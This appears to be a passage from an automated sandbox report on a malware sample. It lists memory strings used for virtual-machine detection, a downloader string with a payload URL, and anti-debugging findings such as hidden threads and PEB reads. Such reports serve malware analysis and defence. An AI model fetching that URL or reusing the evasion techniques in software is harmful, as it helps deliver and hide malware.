Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW[0
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWDmB
Source: Zr26f1rL6r.exe, 0000000A.00000003.47934144925.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749514601.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47939814865.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47750467223.0000000000888000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48060566667.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662983793.000000000097E000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655599394.000000000097E000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin
Source: c8ahotgz8h.exe, 0000001C.00000002.51535505064.0000000000884000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: firefox.exe, 00000019.00000002.50723124652.000001BF40270000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exet
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW\
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(9_%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000E.00000000.47877168581.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779130675.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48061967346.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825346643.000000000D21C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_0232045A rdtsc

2_2_0232045A

Enables debug privileges

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231F3CA mov eax, dword ptr fs:[00000030h]		2_2_0231F3CA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321490 mov eax, dword ptr fs:[00000030h]		2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231FCC1 mov eax, dword ptr fs:[00000030h]		2_2_0231FCC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EBE80 mov eax, dword ptr fs:[00000030h]		10_2_1E8EBE80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCEA0 mov eax, dword ptr fs:[00000030h]		10_2_1E8FCEA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]		10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]		10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CED0 mov ecx, dword ptr fs:[00000030h]		10_2_1E94CED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901ED8 mov eax, dword ptr fs:[00000030h]		10_2_1E901ED8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E989ED2 mov eax, dword ptr fs:[00000030h]		10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E947EC3 mov eax, dword ptr fs:[00000030h]		10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E947EC3 mov ecx, dword ptr fs:[00000030h]		10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994EC1 mov eax, dword ptr fs:[00000030h]		10_2_1E994EC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBED0 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]		10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]		10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]		10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]		10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]		10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]		10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]		10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E963EFC mov eax, dword ptr fs:[00000030h]		10_2_1E963EFC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3EE2 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3EE2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EEE7 mov eax, dword ptr fs:[00000030h]		10_2_1E97EEE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]		10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]		10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]		10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]		10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]		10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]		10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]		10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]		10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E01 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3E01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE18 mov ecx, dword ptr fs:[00000030h]		10_2_1E8BBE18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F8E15 mov eax, dword ptr fs:[00000030h]		10_2_1E8F8E15
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994E03 mov eax, dword ptr fs:[00000030h]		10_2_1E994E03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]		10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]		10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov ecx, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]		10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCE3F mov eax, dword ptr fs:[00000030h]		10_2_1E8FCE3F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2E32 mov eax, dword ptr fs:[00000030h]		10_2_1E8C2E32
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]		10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]		10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]		10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]		10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]		10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]		10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov ecx, dword ptr fs:[00000030h]		10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]		10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]		10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEE48 mov eax, dword ptr fs:[00000030h]		10_2_1E8EEE48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFE40 mov eax, dword ptr fs:[00000030h]		10_2_1E8BFE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]		10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]		10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]		10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDE45 mov eax, dword ptr fs:[00000030h]		10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDE45 mov ecx, dword ptr fs:[00000030h]		10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]		10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]		10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EE78 mov eax, dword ptr fs:[00000030h]		10_2_1E97EE78
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]		10_2_1E970E6D
